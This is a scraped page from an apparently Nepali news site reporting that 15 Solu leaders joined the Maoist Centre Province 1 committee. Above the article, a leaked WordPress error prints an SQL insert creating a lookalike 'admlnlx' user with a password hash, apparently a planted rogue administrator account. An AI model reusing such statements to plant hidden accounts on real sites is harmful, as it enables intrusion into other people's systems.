WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3fAjHY55RX2J0k6TGxgaa32XzzvDE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:43:16', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । नेकपा माओवादी केन्द्र प्रदेश १ कमिटिमा सोलुबाट १५ जना नेता समेटिएका छन् । प्रथम सम्मेलनबाट जिल्लाका १५ नेताहरु प्रदेश सदस्य बनेको नवनिर्वाचित प्रदेश कमिटी सदस्य गौरब राईले जानकारी दिए ।
२५९ सदस्सीय प्रदेश कमिटीमा सोलुबाट ठमनाथ पराजुली धुर्ब, सागर किराँति, हिमाल गिरी, ङिमा तेन्डुप शेर्पा, अशिम राई, नाम्गेल शेर्पा, प्रलाद राई ९प्रज्वल०, गौरब राई, मेनुका पुरी गिरी, सुनिता किराँती, अमृता राई, अनिशा राई, जनरिशी राई, रिमा कुलुङ र गोविन्द बि।क। माओवादीको प्रदेश सदस्य बनेका छन् ।
सोलुले विभिन्न कोटामा १६ सदस्य पाएपनि एक दलित सदस्य खाली राखिएको छ । सम्मेलनले पदाधिकारी भने टुंग्याउन बाँकी रहेको छ ।